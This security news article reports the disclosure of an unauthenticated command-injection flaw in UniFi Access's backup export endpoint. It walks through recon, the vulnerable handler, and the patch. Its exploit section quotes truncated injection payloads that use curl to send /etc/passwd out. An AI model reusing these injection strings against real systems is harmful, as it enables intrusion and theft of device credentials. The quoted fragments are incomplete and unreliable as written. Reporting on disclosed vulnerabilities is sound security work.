Researchers at Catchify Security uncovered a severe unauthenticated remote code execution (RCE) vulnerability in UniFi OS, specifically affecting the UniFi Access application.
Tracked as CVE-2025-52665, the flaw stems from a misconfigured API endpoint in the backup system that lets attackers execute arbitrary commands without credentials.
This discovery, part of a larger pattern of insecure unauthenticated APIs lacking input validation, earned the team a $25,000 bounty from Ubiquiti.
The issue highlights how overlooked design flaws in networked devices can lead to full system compromise.
From Recon To Code Dive: Uncovering The Weak Link
The hunt began with standard network reconnaissance on a target UniFi Dream Machine SE router at 192.168.1.1, revealing the familiar login interface.
Community forums provided crucial clues: they were rife with reports of 500 errors and connection refusals tied to the /api/ucore/backup/export endpoint.

Users frequently encountered failures during backups across modules like Protect, Network, and Access, suggesting a modular system relying on internal loopback APIs.
Delving deeper, the team unpacked UniFi Core releases and scrutinized service.js.
The handler performs no sanitization: it interpolates the request's "dir" value directly into shell commands such as mktemp, chmod, and tar, which is what makes command injection possible.
The handler was intended for localhost-only access, but its exposure through an external proxy created a dangerous bridge to the outside.
Crafting The Exploit: Injection To Interactive Access
Port scanning exposed the vulnerable service on TCP port 9780, where a POST to /api/ucore/backup/export returned a 405 error, confirming the route's existence.
Mimicking the orchestrator’s JSON body, researchers tested payloads.
An initial attempt with {"dir":"/tmp/catchify-lab; curl -s --data-binary @/etc/passwd failed due to trailing shell syntax conflicts from the backup pipeline.

Refining to {"dir":"/tmp/catchify-; curl -s --data-binary @/etc/passwd succeeded, terminating the injection cleanly while commenting out residuals.
This exfiltrated /etc/passwd and enabled a reverse shell, granting interactive root access. In UniFi Access contexts, it compromised door controls and NFC credentials.
Broader Risks And Fixes
Further probing revealed other unauthenticated endpoints, such as /api/v1/user_assets/nfc for creating assets and /api/v1/user_assets/touch_pass/keys, which leaked PEM private keys and NFC data; the findings were verified against Ubiquiti's API docs.
Ubiquiti patched this in UniFi Access 4.0.21; users should upgrade immediately. Reported on October 9, 2025, the fix underscores the need for rigorous API controls in IoT ecosystems.